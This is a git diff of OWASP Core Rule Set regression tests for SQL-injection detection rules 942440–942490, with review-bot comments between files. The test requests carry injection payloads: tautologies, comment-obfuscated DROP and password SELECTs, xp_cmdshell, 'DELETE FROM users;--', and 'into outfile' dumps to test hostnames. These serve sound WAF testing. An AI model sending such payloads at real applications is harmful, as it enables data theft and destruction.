text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=OR 1# " + output: + log_contains: id "942440" + - test_title: 942440-4 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=admin'--" + output: + log_contains: id "942440" + - test_title: 942440-5 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=DROP/*comment*/sampletable" + output: + log_contains: id "942440" + - test_title: 942440-6 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=DR/**/OP/*bypass deny listing*/sampletable" + output: + log_contains: id "942440" + - test_title: 942440-7 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=SELECT/*avoid-spaces*/password/**/FROM/**/Members" + output: + log_contains: id "942440" + - test_title: 942440-8 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=SELECT /*!32302 1/0, */ 1 FROM tablename" + output: + log_contains: id "942440" 
+ - test_title: 942440-9 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' or 1=1# " + output: + log_contains: id "942440" + - test_title: 942440-10 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=‘ or 1=1-- -" + output: + log_contains: id "942440" + - test_title: 942440-11 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=‘ or 1=1/*" + output: + log_contains: id "942440" + - test_title: 942440-12 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=1='1' or-- -" + output: + log_contains: id "942440" + - test_title: 942440-13 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" 
+ uri: "/post" + data: "test=' /*!50000or*/1='1" + output: + log_contains: id "942440" + - test_title: 942440-14 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' /*!or*/1='1" + output: + log_contains: id "942440" + - test_title: 942440-15 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=0/**/union/*!50000select*/table_name`foo`/**/" + output: + log_contains: id "942440" + - test_title: 942440-16 + desc: "Avoid False Positive on JWT (body)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "POST" + port: 80 + version: "HTTP/1.1" + uri: "/post" + data: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + output: + no_log_contains: id "942440" + - test_title: 942440-17 + desc: "Avoid False Positive on JWT (cookie)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + method: "POST" + port: 80 + version: "HTTP/1.1" + uri: "/post" + data: "foo=bar" + output: + no_log_contains: id "942440" + - test_title: 942440-18 + desc: "Avoid False Positive on JWT (querystring)" + 
stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "GET" + port: 80 + version: "HTTP/1.1" + uri: "/callback?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + output: + no_log_contains: id "942440" + - test_title: 942440-19 + desc: "False positive against Facebook click identifier" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "GET" + port: 80 + version: "HTTP/1.1" + uri: "/get/?fbclid=IwAR1dug0BYxe0ukhZ2vKrdQwLAxVFRJ--Q2Y7OBJE_0uId9-Eh-sJWLdVk2E" + output: + no_log_contains: id "942440" + - test_title: 942440-20 + desc: "False positive against Google click identifier" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "GET" + port: 80 + version: "HTTP/1.1" + uri: "/get/?gclid=j0KCQiA1NebBhDDARIsAANiDD3_RJeMv8zScF--mC1jf8fO8PDYJCxD9xdwT7iQ59QIIwL-86ncQtMaAh0lEALw_wcB" + output: + no_log_contains: id "942440" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml index dd23841ee6..a308e3be75 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml 
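Review bot: Tests 942440-10 and 942440-11 open the payload with the typographic quote U+2018 (`‘ or 1=1-- -`, `‘ or 1=1/*`) while 942440-9 uses the ASCII apostrophe (`' or 1=1# `), which looks like a copy-paste artifact; as written the quote contributes nothing to the match, which rests entirely on the `-- -` and `/*` tails. If an ASCII quote was intended, change them to `data: "test=' or 1=1-- -"` and `data: "test=' or 1=1/*"`; if the non-ASCII quote is deliberate, a `desc` saying so would keep the next maintainer from normalising it. Separately, the three `no_log_contains` cases (JWT, fbclid, gclid) all exercise `--` embedded in a base64url-style run, and the rule change that makes them pass is outside this diff; a positive case pinning the intended outcome for a `--` comment with no surrounding whitespace in an ordinary parameter value (e.g. `data: "test=1 or 1=1--xyz-"`) would show whether the exemption widens into a bypass. Those negative tests also switch to `HTTP/1.1` and drop the `Accept` header every positive test in this file carries; aligning them keeps the two groups comparable.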
@@ -1,92 +1,92 @@ --- - meta: - author: "William Woodson" - description: None - enabled: true - name: 942450.yaml - tests: - - - test_title: 942450-1 +meta: + author: "William Woodson" + description: None + enabled: true + name: 942450.yaml +tests: + - test_title: 942450-1 desc: "SQL Hex Encoding" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - method: POST - uri: "/" - data: "var=%5c0xf00dsdfdsa" - version: HTTP/1.0 - output: - log_contains: id "942450" - - - test_title: 942450-2 + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/" + data: "var=%5c0xf00dsdfdsa" + version: HTTP/1.0 + output: + log_contains: id "942450" + - test_title: 942450-2 desc: "SQL Hex Encoding" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - method: POST - uri: "/" - data: "var=concat%280x223e3c62723e%2Cversion%28%29%2C0x3c696d67207372633d22%29" - version: HTTP/1.0 - output: - log_contains: id "942450" - - - test_title: 942450-3 + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/" + data: "var=concat%280x223e3c62723e%2Cversion%28%29%2C0x3c696d67207372633d22%29" + version: HTTP/1.0 + output: + log_contains: id "942450" + - test_title: 942450-3 desc: "SQL Hex Encoding" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - method: POST - uri: "/" - data: "var=select%200x616263" - version: HTTP/1.0 - output: - log_contains: id "942450" - - - test_title: 942450-4 + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP 
CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/" + data: "var=select%200x616263" + version: HTTP/1.0 + output: + log_contains: id "942450" + - test_title: 942450-4 desc: "SQL Hex Encoding - negative" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - method: POST - uri: "/" - data: "var=IHRlc3Q0xAcF" - version: HTTP/1.0 - output: - no_log_contains: id "942450" - - - test_title: 942450-5 + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/" + data: "var=IHRlc3Q0xAcF" + version: HTTP/1.0 + output: + no_log_contains: id "942450" + - test_title: 942450-5 desc: "SQL Hex Encoding - negative" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - method: POST - uri: "/" - data: "var=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08" - version: HTTP/1.0 - output: - no_log_contains: id "942450" + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/" + data: "var=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08" + version: HTTP/1.0 + output: + no_log_contains: id "942450" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml new file mode 100644 index 0000000000..e2776bd052 --- /dev/null +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml 
@@ -0,0 +1,41 @@
+---
+meta:
+ author: "Franziska Bühler"
+ description: None
+ enabled: true
+ name: 942460.yaml
+tests:
+ - test_title: 942460-1
+ desc: "Repetitive Non-Word Characters"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ port: 80
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ uri: "/"
+ data: "var=foo...."
+ version: HTTP/1.1
+ output:
+ log_contains: id "942460"
+ - test_title: 942460-2
+ desc: "Repetitive Non-Word Characters negative test only 3 characters"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ port: 80
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ uri: "/"
+ data: "var=foo..."
+ version: HTTP/1.1
+ output:
+ no_log_contains: id "942460"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml
index dc6f8b9564..0b569ededc 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml
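Review bot: The new file's meta block ships `description: None`, which YAML reads as the literal string "None" rather than a null, so it is a placeholder that will show up verbatim in any tooling that prints test metadata. The same commit replaces that placeholder in 942500.yaml with a real sentence, and this brand-new file should get one as well, e.g. `description: "Rule 942460: four or more repeated non-word characters match, three do not"`, which is exactly what the two stages (`foo....` positive, `foo...` negative) demonstrate. It would also help a future reader if the negative test's desc said why three is the boundary rather than just "only 3 characters", but that is presumably tied to the rule's threshold, which is not visible here.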
@@ -1,177 +1,193 @@ --- - meta: - author: "Christoph Hansen" - description: None - enabled: true - name: 942470.yaml - tests: - - - test_title: 942470-1 +meta: + author: "Christoph Hansen" + description: None + enabled: true + name: 942470.yaml +tests: + - test_title: 942470-1 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=nvarchar" - version: HTTP/1.0 - output: - log_contains: id "942470" - - - test_title: 942470-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=nvarchar" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-2 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=xp_cmdshell" - version: HTTP/1.0 - output: - log_contains: id "942470" - - - test_title: 942470-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=xp_cmdshell" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-3 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=varchar" - version: HTTP/1.0 - output: - log_contains: id "942470" - - - test_title: 942470-4 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + 
method: POST + port: 80 + uri: "/" + data: "pay=varchar" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-4 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=xp_dirtree" - version: HTTP/1.0 - output: - log_contains: id "942470" - - - test_title: 942470-5 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=xp_dirtree" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-5 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=xp_regread" - version: HTTP/1.0 - output: - log_contains: id "942470" - - - test_title: 942470-6 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=xp_regread" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-6 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=sp_password" - version: HTTP/1.0 - output: - log_contains: id "942470" - - - test_title: 942470-7 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=sp_password" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 
942470-7 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=UTL_HTTP" - version: HTTP/1.0 - output: - log_contains: id "942470" - - - test_title: 942470-8 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=UTL_HTTP" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-8 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=OPENROWSET" - version: HTTP/1.0 - output: - log_contains: id "942470" - - - test_title: 942470-9 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=OPENROWSET" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-9 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=sp_executesql" - version: HTTP/1.0 - output: - log_contains: id "942470" - - - test_title: 942470-10 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=sp_executesql" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-10 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: 
POST - port: 80 - uri: "/" - data: "sp_executesql" - version: HTTP/1.0 - output: - log_contains: id "942470" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "sp_executesql" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-11 + desc: "SQL Injection Attack: current_user" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=1%2bcurrent_user::int" + version: HTTP/1.0 + output: + log_contains: id "942470" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml index 28f5baca0e..645657712f 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml 
@@ -1,43 +1,210 @@ --- - meta: - author: "Jose Nazario" - description: None - enabled: true - name: 942480.yaml - tests: - - - test_title: 942480-1 +meta: + author: "Jose Nazario" + description: None + enabled: true + name: 942480.yaml +tests: + - test_title: 942480-1 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - method: GET - port: 80 - # variable name boundary attacks - uri: "/?'msdasql'" - version: HTTP/1.0 - output: - log_contains: "id \"942480" - - - test_title: 942480-2 + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # variable name boundary attacks + uri: "/?'msdasql'" + version: HTTP/1.0 + output: + log_contains: "id \"942480" + - test_title: 942480-2 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - # variable name boundary attacks - Cookie: "'msdasql'" - method: POST - port: 80 - version: HTTP/1.0 - output: - log_contains: "id \"942480" + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + # variable name boundary attacks + Cookie: "'msdasql'" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + version: HTTP/1.0 + output: + log_contains: "id \"942480" + - test_title: 942480-3 + desc: "Data dump using 'into outfile'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=EmptyValue into outfile '\\\\\\\\jviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\\\\xct'; --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-4 + desc: "Data dump using 'into outfile'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=/config.ini' into outfile '\\\\\\\\il7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\\\\yxq'; --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-5 + desc: "SQL injection using 'UNION ALL" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=0.3480567293179807' UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-6 + desc: "SQL injection using 'UNION ALL" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=config.ini\") UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-7 + desc: "SQL injection using 'UNION ALL" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + 
method: POST + port: 80 + uri: "/" + data: "var=CRS) UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-8 + desc: "SQL injection using 'UNION ALL" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=CRS3\") UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-9 + desc: "SQL injection using 'overlay(...placing..)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=overlay(password%20placing%20%27%27%20from%201%20for%200)::int" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-10 + desc: "SQL injection in User-Agent" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: DELETE FROM users;-- + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-11 + desc: "SQL injection in arbitrary header" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + SomeHeader: DELETE FROM users;-- + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-12 + desc: "SQL injection using 'overlay(...placing..) 
with newlines" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=overlay(password%0aplacing%0a%27%27%0afrom%201%20for%200)::int" + version: HTTP/1.0 + output: + log_contains: id "942480" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml index 95c9064898..d02e17800d 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml 
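Review bot: Several of the new descriptions carry an unbalanced opening quote that reads like a truncated string: 942480-5 through 942480-8 use `desc: "SQL injection using 'UNION ALL"` and 942480-9/-12 use `desc: "SQL injection using 'overlay(...placing..)"`; drop the stray `'` (e.g. `desc: "SQL injection using UNION ALL select NULL"` and `desc: "SQL injection using overlay(... placing ...)::int"`) so the titles are not mistaken for an encoding error when they appear in test output. Separately, the ten added tests use the bare `log_contains: id "942480"` form while the two pre-existing tests at the top of the hunk still use `log_contains: "id \"942480"`, which has no closing quote in the matched text; aligning the first two with the new form keeps the file consistent and makes the match unambiguous. The `into outfile '\\\\...coreruleset.org\\xct'` payloads in 942480-3/-4 embed UNC-style hostnames, which is fine for a WAF regression test since nothing here resolves them, but a one-line comment above those stages saying the hostname is inert would save the next reader from wondering whether the suite makes outbound requests.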
